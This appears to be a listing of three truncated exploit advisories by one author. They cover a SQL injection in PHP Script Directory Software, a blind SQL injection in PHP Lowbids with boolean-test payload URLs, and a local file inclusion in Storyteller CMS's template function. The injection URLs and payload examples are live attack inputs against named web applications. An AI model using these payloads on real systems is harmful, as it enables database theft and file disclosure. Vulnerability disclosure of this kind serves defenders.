PHP Script Directory Software - 'sbcat_id' SQL Injection

== Author: BorN To K!LL - h4ck3r Contact: [email protected] == Script: PHP script directory software Version: n/a Link: http://www.softbizsolutions.com/script-directory-software.php == 3xploit: path/showcats.php?sbcatid=SQL-Injection 3xample:...

PHP Lowbids - 'viewfaqs.php' Blind SQL Injection

== +Script: PHP Lowbids +Version: n/a +Link: http://phplowbids.com == +Author: BorN To K!LL - h4ck3r +Contact: [email protected] == +3xploit: /viewfaqs.php?cat=Blind-Injection +3xample: /viewfaqs.php?cat=1 and substringversion,1,1=4 // true /viewfaqs.php?cat=1 and substringversion,1,1=5 // false ...

Storyteller CMS Local File Inclusion

== Title: Storyteller CMS var Local File Include Vuln Version: n/a Link: http://www.esselbach.com/freeware.php?id=2 == Author: BorN To K!LL - h4ck3r Contact: [email protected] == Vuln code: in GetTemplate function , line 113 to 127 function GetTemplate$var if fileexists"templates/$var.tmp.php"...